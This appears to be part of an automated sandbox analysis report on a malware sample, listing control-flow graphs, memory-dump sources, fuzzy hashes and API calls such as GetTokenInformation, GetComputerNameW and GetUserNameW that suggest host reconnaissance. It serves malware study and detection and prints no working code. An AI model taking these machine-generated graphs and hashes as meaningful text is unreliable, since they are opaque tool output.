                                                                                                                                                                      control_flow_graph 79 4c8070-4c817e 81 4c813d-4c81a5 79->81 82 4c8180 79->82 88 4c81bd-4c81ca 81->88 89 4c81a7 81->89 82->81 85 4c8161 82->85 87 4c8163-4c8170 call 4f7164 85->87 93 4c8186 CloseHandle 87->93 94 4c8172 87->94 95 4c81d0 88->95 96 4c80f3 88->96 97 4c818c-4c8192 93->97 94->97 110 4c81fe-4c8201 GetTokenInformation 95->110 111 4c80c3 95->111 101 4c808c 96->101 102 4c80f5 96->102 99 4c8194 97->99 100 4c8115-4c8118 97->100 99->100 105 4c819a 99->105 103 4c8119-4c811a 100->103 104 4c80a7 100->104 106 4c808e-4c8184 101->106 102->101 112 4c8077 102->112 103->104 109 4c811c 103->109 105->81 106->93 106->97 115 4c820f 109->115 110->115 125 4c81b7 110->125 111->110 116 4c80c9 111->116 117 4c81d7-4c81de call 4f715c 112->117 115->106 122 4c8215-4c821e 115->122 120 4c80ca-4c80d8 GetTokenInformation 116->120 123 4c81e3-4c81e6 117->123 124 4c810f 120->124 122->106 132 4c8224 122->132 123->120 139 4c8089 123->139 126 4c812d 124->126 127 4c8111 124->127 125->115 130 4c81b9-4c81bb 125->130 134 4c80a8 126->134 135 4c8133-4c81f0 126->135 127->126 131 4c8113 127->131 130->88 131->100 132->117 137 4c8226 132->137 136 4c80aa-4c80ad 134->136 142 4c80da-4c80f1 135->142 143 4c81f6 135->143 136->87 140 4c80b3-4c8203 136->140 137->117 141 4c8228-4c82ee call 4c5d90 137->141 139->120 144 4c808b 139->144 140->87 149 4c8209 140->149 154 4c830c-4c8320 call 4c5d90 call 4cec00 141->154 155 4c82f0 141->155 142->136 143->142 147 4c81fc 143->147 144->101 147->110 159 4c82f7-4c82fc call 4c5d90 154->159 170 4c8322 154->170 155->154 157 4c82f2 155->157 157->159 165 4c8302 159->165 166 4c8253-4c8265 call 4e1280 159->166 165->166 167 4c8308-4c830a 165->167 173 4c8328 166->173 174 4c826b 166->174 167->154 170->159 172 4c8324-4c8326 170->172 172->173 178 4c82df-4c832b 173->178 179 4c8335 173->179 174->173 177 4c823f-4c8243 174->177 177->159 178->179 182 4c832d-4c8331 178->182 183 4c829b-4c829d 179->183 184 4c8287 179->184 182->179 184->183 186 4c824e-4c8252 184->186 186->166
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 98d7738d5943052b3f4b969ae38aa39bdfeb94edb5aebf39e1e8633f8f1ead71
                                                                                                                                                                      • Instruction ID: df9534f1526cd99e0ce45afacf2463a952f148465379d9a3782026ac099709a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 98d7738d5943052b3f4b969ae38aa39bdfeb94edb5aebf39e1e8633f8f1ead71
                                                                                                                                                                      • Instruction Fuzzy Hash: F661FE3C51CA899FC7E58B298818F767AE0BB55350F1A02AFD446C32A1CF2C5C46875F
                                                                                                                                                                      Function 004C5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 4c5910-4c5968 189 4c596a 187->189 190 4c5915-4c5928 call 4f9970 187->190 189->190 194 4c5931-4d072c 189->194 195 4c59b8 call 4e0df0 190->195 198 4d0806-4d0809 194->198 199 4d0732-4d0738 194->199 200 4c59bd-4c59c2 call 4c5d90 195->200 206 4d079d-4d07a6 198->206 202 4d073e 199->202 203 4d0800 199->203 211 4c59c7-4c59ce 200->211 202->203 207 4d0744-4d0774 202->207 203->198 205 4d06b3-4d06b7 203->205 205->206 208 4d06bd 205->208 209 4d07a8 206->209 210 4d0791-4d0793 206->210 218 4d077a-4d081c 207->218 219 4d06d5-4d06d9 207->219 208->206 213 4d06c3-4d07fe 208->213 209->210 215 4d07aa 209->215 214 4d07ca-4d07cc 210->214 216 4c5a1a-4c5a26 call 4c5e10 211->216 217 4c59d0 211->217 213->203 215->214 216->195 232 4c5a08-4c5a0b 216->232 217->216 225 4c59d2-4c59d8 217->225 218->206 222 4d06df 219->222 223 4d06db 219->223 222->206 223->222 226 4d06dd 223->226 239 4c59d9-4c59de call 4f2190 225->239 226->222 229 4dc0cc 226->229 233 4dc0ce-4dc0d0 229->233 234 4dc0e8-4dc102 229->234 237 4c5a0d 232->237 238 4c5994-4c599c 232->238 236 4dc0d2-4dc0df 233->236 235 4dc104 234->235 234->236 235->236 251 4dc0e7 235->251 236->251 248 4c5991 237->248 249 4c5932 237->249 243 4c599e-4c59f7 238->243 244 4c5a02 238->244 239->238 254 4c59e0 239->254 243->244 252 4c597d 244->252 253 4c59d4-4c5a15 call 4e11a0 244->253 248->249 255 4c5993 248->255 256 4c59e4-4c59ec call 4f21ac 249->256 252->253 258 4c597f-4c5981 252->258 254->238 259 4c59e2 254->259 255->238 266 4c59ed 256->266 267 4c5a62-4c5a6e 256->267 262 4c5983-4c5a38 258->262 259->256 262->238 269 4c5a3e 262->269 266->262 272 4c59ee-4c59ef 266->272 270 4c5a75-4c5ab3 call 4e1280 267->270 271 4c5a70 267->271 269->239 280 4c5abb-4c5ac9 270->280 281 4c5ab5 270->281 271->270 274 4c5a72 271->274 272->262 273 4c59f1 272->273 273->190 274->270 283 4c5af2-4c5af5 280->283 281->280 282 4c5ab7-4c5ab9 281->282 282->280 286 4c5adb-4c5adc 283->286 287 4c5ad5 283->287 289 4c5a45-4c5a46 286->289 290 4c5ae2 286->290 287->286 288 4c5ad7-4c5ad9 287->288 288->286 290->289 291 4c5ae8 290->291 291->283
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: d20b7733f4241af9f05e4f971fadfeedb5ab551a0bfe62aaf90c88b48294f6bd
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF1397071CE888FC7A9A72E58517BA73D2E799314F58029FD04AC7396DD3C9C46838A
                                                                                                                                                                      Function 004C5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 336 4c5b42-4c5b47 call 4c5d90 338 4c5b4c-4c5b52 336->338 340 4c5b0d 338->340 341 4c5c42-4c5c62 call 4e1280 338->341 340->341 342 4c5b13 340->342 356 4c5c14-4c5cc0 341->356 357 4c5c26 341->357 344 4c5c8f-4c5c96 342->344 346 4c5c98-4c5c9a 344->346 347 4c5c29 344->347 348 4c5c9c 346->348 349 4c5c2f-4c5c36 347->349 350 4c5cc2-4c5cc9 call 4c52a0 347->350 359 4c5d0e-4c5d18 348->359 360 4c5bfa 348->360 349->350 353 4c5c3c 349->353 362 4c5c69 350->362 363 4c5ccb 350->363 353->336 356->350 357->356 361 4c5c28 357->361 365 4c5d1a 359->365 366 4c5d54 359->366 360->359 364 4c5c00 360->364 361->347 369 4c5c6f 362->369 370 4c5b68-4c5d75 362->370 363->348 368 4c5ccd 363->368 364->356 371 4c5d4b-4c5d52 365->371 368->348 372 4c5ccf-4c5ce4 CreateThread 368->372 369->370 374 4c5c75 369->374 371->366 375 4c5d45-4c5d47 371->375 379 4c5cea 372->379 380 4c5c01-4c5c05 372->380 374->344 376 4c5d5f 375->376 377 4c5d49 375->377 382 4c5d65 376->382 377->371 377->376 379->380 383 4c5cf0-4c5cf6 379->383 384 4c5c20-4c5c68 380->384 387 4c5d37-4c5d41 380->387 382->382 383->384 387->371 388 4c5d43 387->388 388->366
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 32258154924604f7f18ecc769c5b9cea0415959b4aa62b0fa6b9201b33b30855
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A21822810CF458FDBE997189848F7E6AE1AB55310F5841AF9047CF392DA2CBCC5931E
                                                                                                                                                                      Function 004C5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 389 4c5b09-4c5d01 394 4c5bb4-4c5ce4 CreateThread 389->394 395 4c5d07 389->395 402 4c5cea 394->402 403 4c5c01-4c5c05 394->403 395->394 396 4c5d0d 395->396 398 4c5d37-4c5d41 396->398 400 4c5d4b-4c5d52 398->400 401 4c5d43 398->401 404 4c5d54 400->404 407 4c5d45-4c5d47 400->407 401->404 402->403 406 4c5cf0-4c5cf6 402->406 403->398 410 4c5c20-4c5c68 403->410 406->410 408 4c5d5f 407->408 409 4c5d49 407->409 413 4c5d65 408->413 409->400 409->408 413->413
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 12dfba167f705562a6086b7466c9fd2d208511165507b1cffbfd6856bb1881b7
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: AA01AD3810DF468EEBD556248C58F7E6A90AB50324F6401AFC487CA191EA6C79C2A70F
                                                                                                                                                                      Function 004C5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 414 4c5b87-4c5b99 CreateThread 415 4c5b1c-4c5b3b 414->415 416 4c5cff-4c5d01 414->416 415->416 417 4c5bb4-4c5ce4 CreateThread 416->417 418 4c5d07 416->418 426 4c5cea 417->426 427 4c5c01-4c5c05 417->427 418->417 419 4c5d0d 418->419 422 4c5d37-4c5d41 419->422 424 4c5d4b-4c5d52 422->424 425 4c5d43 422->425 428 4c5d54 424->428 431 4c5d45-4c5d47 424->431 425->428 426->427 430 4c5cf0-4c5cf6 426->430 427->422 434 4c5c20-4c5c68 427->434 430->434 432 4c5d5f 431->432 433 4c5d49 431->433 437 4c5d65 432->437 433->424 433->432 437->437
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: c046ac2f032d7e43114e27664372dfe95edad6a3083be5fdb60f270ffa2760d1
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: A9E0863460DB444FEB999B24582071E7EE5EB88310F1502CFC44AD72D5DB6D3E46478B
                                                                                                                                                                      Function 004C599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 438 4c599b-4c599e 439 4c59b8 call 4e0df0 438->439 440 4c59f7 438->440 444 4c59bd-4c59c2 call 4c5d90 439->444 441 4c5a02 440->441 445 4c597d 441->445 446 4c59d4-4c5a15 call 4e11a0 441->446 450 4c59c7-4c59ce 444->450 445->446 449 4c597f-4c5981 445->449 452 4c5983-4c5a38 449->452 453 4c5a1a-4c5a26 call 4c5e10 450->453 454 4c59d0 450->454 460 4c5a3e 452->460 461 4c5994-4c599c 452->461 453->439 467 4c5a08-4c5a0b 453->467 454->453 458 4c59d2-4c59d8 454->458 468 4c59d9-4c59de call 4f2190 458->468 460->468 461->441 464 4c599e 461->464 464->440 467->461 469 4c5a0d 467->469 468->461 475 4c59e0 468->475 473 4c5991 469->473 474 4c5932 469->474 473->474 476 4c5993 473->476 478 4c59e4-4c59ec call 4f21ac 474->478 475->461 477 4c59e2 475->477 476->461 477->478 481 4c59ed 478->481 482 4c5a62-4c5a6e 478->482 481->452 485 4c59ee-4c59ef 481->485 483 4c5a75-4c5ab3 call 4e1280 482->483 484 4c5a70 482->484 495 4c5abb-4c5ac9 483->495 496 4c5ab5 483->496 484->483 487 4c5a72 484->487 485->452 486 4c59f1 call 4f9970 485->486 486->439 487->483 498 4c5af2-4c5af5 495->498 496->495 497 4c5ab7-4c5ab9 496->497 497->495 501 4c5adb-4c5adc 498->501 502 4c5ad5 498->502 504 4c5a45-4c5a46 501->504 505 4c5ae2 501->505 502->501 503 4c5ad7-4c5ad9 502->503 503->501 505->504 506 4c5ae8 505->506 506->498
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: fbbd761bf2940dbdc0b6fca2688fa355d020a9a4ab31128d0d393044c036d54b
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 6501DFEC60DE80CFD6DAA6195401F7E2552A754324F2801DF904AC7292C87DB9C2978E
                                                                                                                                                                      Function 004C8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 507 4c8090-4c8096 508 4c813c-4c81a5 507->508 509 4c8184 507->509 522 4c81bd-4c81ca 508->522 523 4c81a7 508->523 510 4c818c-4c8192 509->510 511 4c8186 CloseHandle 509->511 513 4c8194 510->513 514 4c8115-4c8118 510->514 511->510 513->514 517 4c819a 513->517 515 4c8119-4c811a 514->515 516 4c80a7 514->516 515->516 519 4c811c 515->519 517->508 521 4c820f 519->521 524 4c808e-4c8096 521->524 525 4c8215-4c821e 521->525 528 4c81d0 522->528 529 4c80f3 522->529 524->509 525->524 530 4c8224 525->530 540 4c81fe-4c8201 GetTokenInformation 528->540 541 4c80c3 528->541 532 4c808c 529->532 533 4c80f5 529->533 534 4c8226 530->534 535 4c81d7-4c81e6 call 4f715c 530->535 532->524 533->532 542 4c8077 533->542 534->535 538 4c8228-4c82ee call 4c5d90 534->538 548 4c80ca-4c810f GetTokenInformation 535->548 558 4c8089 535->558 563 4c830c-4c8320 call 4c5d90 call 4cec00 538->563 564 4c82f0 538->564 540->521 554 4c81b7 540->554 541->540 545 4c80c9 541->545 542->535 545->548 555 4c812d 548->555 556 4c8111 548->556 554->521 559 4c81b9-4c81bb 554->559 561 4c80a8 555->561 562 4c8133-4c81f0 555->562 556->555 560 4c8113 556->560 558->548 565 4c808b 558->565 559->522 560->514 566 4c80aa-4c80ad 561->566 573 4c80da-4c80f1 562->573 574 4c81f6 562->574 575 4c82f7-4c82fc call 4c5d90 563->575 594 4c8322 563->594 564->563 569 4c82f2 564->569 565->532 571 4c8163-4c8170 call 4f7164 566->571 572 4c80b3-4c8203 566->572 569->575 571->511 586 4c8172 571->586 572->571 584 4c8209 572->584 573->566 574->573 578 4c81fc 574->578 588 4c8302 575->588 589 4c8253-4c8265 call 4e1280 575->589 578->540 586->510 588->589 590 4c8308-4c830a 588->590 597 4c8328 589->597 598 4c826b 589->598 590->563 594->575 596 4c8324-4c8326 594->596 596->597 602 4c82df-4c832b 597->602 603 4c8335 597->603 598->597 601 4c823f-4c8243 598->601 601->575 602->603 606 4c832d-4c8331 602->606 607 4c829b-4c829d 603->607 608 4c8287 603->608 606->603 608->607 610 4c824e-4c8252 608->610 610->589
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: b0a64aaf1dc272858245ba5fb60eab6aabc5c38a2e5de13ab2b36a37e8336e9e
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 06C08C7C13880A9657F80A480C0BFB226C49202350B0E000F8C0280320DD0C8E03009F
                                                                                                                                                                      Function 004C817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 611 4c817f 612 4c8184 611->612 613 4c818c-4c8192 612->613 614 4c8186 CloseHandle 612->614 615 4c8194 613->615 616 4c8115-4c8118 613->616 614->613 615->616 619 4c819a-4c81a5 615->619 617 4c8119-4c811a 616->617 618 4c80a7 616->618 617->618 620 4c811c 617->620 630 4c81bd-4c81ca 619->630 631 4c81a7 619->631 622 4c820f 620->622 624 4c808e-4c8096 622->624 625 4c8215-4c821e 622->625 624->612 625->624 629 4c8224 625->629 632 4c8226 629->632 633 4c81d7-4c81e6 call 4f715c 629->633 637 4c81d0 630->637 638 4c80f3 630->638 632->633 635 4c8228-4c82ee call 4c5d90 632->635 654 4c8089 633->654 655 4c80ca-4c810f GetTokenInformation 633->655 659 4c830c-4c8320 call 4c5d90 call 4cec00 635->659 660 4c82f0 635->660 650 4c81fe-4c8201 GetTokenInformation 637->650 651 4c80c3 637->651 643 4c808c 638->643 644 4c80f5 638->644 643->624 644->643 652 4c8077 644->652 650->622 672 4c81b7 650->672 651->650 656 4c80c9 651->656 652->633 654->655 661 4c808b 654->661 662 4c812d 655->662 663 4c8111 655->663 656->655 671 4c82f7-4c82fc call 4c5d90 659->671 697 4c8322 659->697 660->659 666 4c82f2 660->666 661->643 669 4c80a8 662->669 670 4c8133-4c81f0 662->670 663->662 667 4c8113 663->667 666->671 667->616 673 4c80aa-4c80ad 669->673 681 4c80da-4c80f1 670->681 682 4c81f6 670->682 688 4c8302 671->688 689 4c8253-4c8265 call 4e1280 671->689 672->622 677 4c81b9-4c81bb 672->677 678 4c8163-4c8170 call 4f7164 673->678 679 4c80b3-4c8203 673->679 677->630 678->614 696 4c8172 678->696 679->678 695 4c8209 679->695 681->673 682->681 686 4c81fc 682->686 686->650 688->689 691 4c8308-4c830a 688->691 701 4c8328 689->701 702 4c826b 689->702 691->659 696->613 697->671 699 4c8324-4c8326 697->699 699->701 706 4c82df-4c832b 701->706 707 4c8335 701->707 702->701 705 4c823f-4c8243 702->705 705->671 706->707 710 4c832d-4c8331 706->710 711 4c829b-4c829d 707->711 712 4c8287 707->712 710->707 712->711 714 4c824e-4c8252 712->714 714->689
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: c2195d8f4d9cdb0b84694d99ec59b186e115fcaf9154792078a8137cc9650252
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: A3C092BC5A850D8756F82B882C0AEB335D85613760F0E541FED069A362DD5C4D4345AF

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:79
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 5798 6c55ef 5801 6c55ac 5798->5801 5800 6c55e9 5801->5800 5802 6e3870 5801->5802 5803 6e3876 5802->5803 5805 6e3893 5803->5805 5806 6e3720 5803->5806 5805->5801 5809 6d0c42 5806->5809 5807 6e37dd 5807->5805 5808 6ce050 VirtualAlloc 5808->5809 5809->5806 5809->5807 5809->5808 5793 6c5b09 5794 6c5b16 5793->5794 5795 6c5cdf CreateThread 5794->5795 5796 6c5c01 5794->5796 5795->5796 5797 6c54a0 5795->5797 5810 6c55e4 5812 6c55ac 5810->5812 5811 6e3870 VirtualAlloc 5811->5812 5812->5810 5812->5811 5813 6c55e9 5812->5813 5705 6c5b87 CreateThread 5706 6c5b1c 5705->5706 5711 6c5810 5705->5711 5707 6c5cdf CreateThread 5706->5707 5708 6c5c01 5706->5708 5707->5708 5709 6c54a0 5707->5709 5710 6c54b5 5709->5710 5712 6c5822 5711->5712 5713 6c5b00 5714 6c5bba 5713->5714 5721 6d52c0 5714->5721 5716 6c5bc7 5720 6c5bde 5716->5720 5726 6e0080 5716->5726 5722 6d52c6 5721->5722 5725 6d52ce 5721->5725 5722->5725 5740 6ce050 5722->5740 5725->5716 5731 6e0089 5726->5731 5727 6e03e0 GetComputerNameW 5727->5731 5728 6e0181 VirtualFree 5728->5731 5729 6ce050 VirtualAlloc 5729->5731 5730 6e03bf GetUserNameW 5730->5731 5731->5727 5731->5728 5731->5729 5731->5730 5732 6e04d6 GetComputerNameW 5731->5732 5733 6c5c7b 5731->5733 5732->5731 5734 6c8070 5733->5734 5738 6c8075 5734->5738 5735 6c8186 CloseHandle 5735->5738 5736 6c80ca GetTokenInformation 5736->5738 5737 6c81ad GetTokenInformation 5737->5738 5738->5735 5738->5736 5738->5737 5739 6c80a7 5738->5739 5739->5720 5741 6ce0c3 5740->5741 5742 6ce0d8 VirtualAlloc 5741->5742 5742->5741 5754 6c5860 5755 6d52c0 VirtualAlloc 5754->5755 5756 6c5869 5755->5756 5757 6e0080 5 API calls 5756->5757 5758 6c587d 5757->5758 5759 6c8070 3 API calls 5758->5759 5760 6c5870 5759->5760 5749 6c5b42 5750 6c5b07 5749->5750 5750->5749 5751 6c5cdf CreateThread 5750->5751 5752 6c5b68 5750->5752 5751->5752 5753 6c54a0 5751->5753 5761 6c8090 5763 6c8075 5761->5763 5762 6c8186 CloseHandle 5762->5763 5763->5762 5764 6c80ca GetTokenInformation 5763->5764 5765 6c81ad GetTokenInformation 5763->5765 5766 6c80a7 5763->5766 5764->5763 5765->5763 5814 6c57f0 5815 6c55ac 5814->5815 5816 6c55e9 5815->5816 5817 6e3870 VirtualAlloc 5815->5817 5817->5815 5743 6c81b1 5747 6c8075 5743->5747 5744 6c8186 CloseHandle 5744->5747 5745 6c80ca GetTokenInformation 5745->5747 5746 6c81ad GetTokenInformation 5746->5747 5747->5744 5747->5745 5747->5746 5748 6c80a7 5747->5748

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 006C52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 293 6c52a0-6c52a5 294 6c532e-6c533f 293->294 295 6c52ab-6c52f5 293->295 299 6c536b-6c5390 294->299 295->294 298 6c52f7 295->298 300 6c53fe 298->300 308 6c5392-6c539a 299->308 309 6c53c3 299->309 302 6c5404-6c540e 300->302 303 700d4c-700d4e 300->303 305 6c5424 302->305 306 6c542a 305->306 307 6c539b 305->307 306->307 310 6c5430-6c5443 306->310 311 6c539d-6c53a1 307->311 312 6c5413-6c5419 307->312 308->307 313 6c53a7 311->313 314 6c52b0-6c52b5 311->314 313->314 315 6c53ad 313->315 316 6c53af-6c53f1 315->316 317 6c53f3-6c53f9 315->317 316->312 316->317 317->300 320 6c5322-6c5328 317->320 321 6c532a 320->321 322 6c5355 320->322 321->322 323 6c532c 321->323 325 6c52e8-6c5363 322->325 326 6c52d1-6c52e7 322->326 323->294 329 6c5365 325->329 330 6c53d1-6c53d5 325->330 326->325 329->330 332 6c5367-6c5369 329->332 330->311 331 6c53d7 330->331 334 6c534b 331->334 335 6c5400-6c540e 331->335 332->299 334->335 336 6c5351-6c5353 334->336 335->305 336->322
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 006C53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 92474f1bab98151f070f3345188d067c281996d052150673fbd02a1fe766ff72
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41C36140DED58FD72A52244C64FF17BD2DB113A2F9941DED08B8A2E2F2987CC29366
                                                                                                                                                                      Function 006E0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
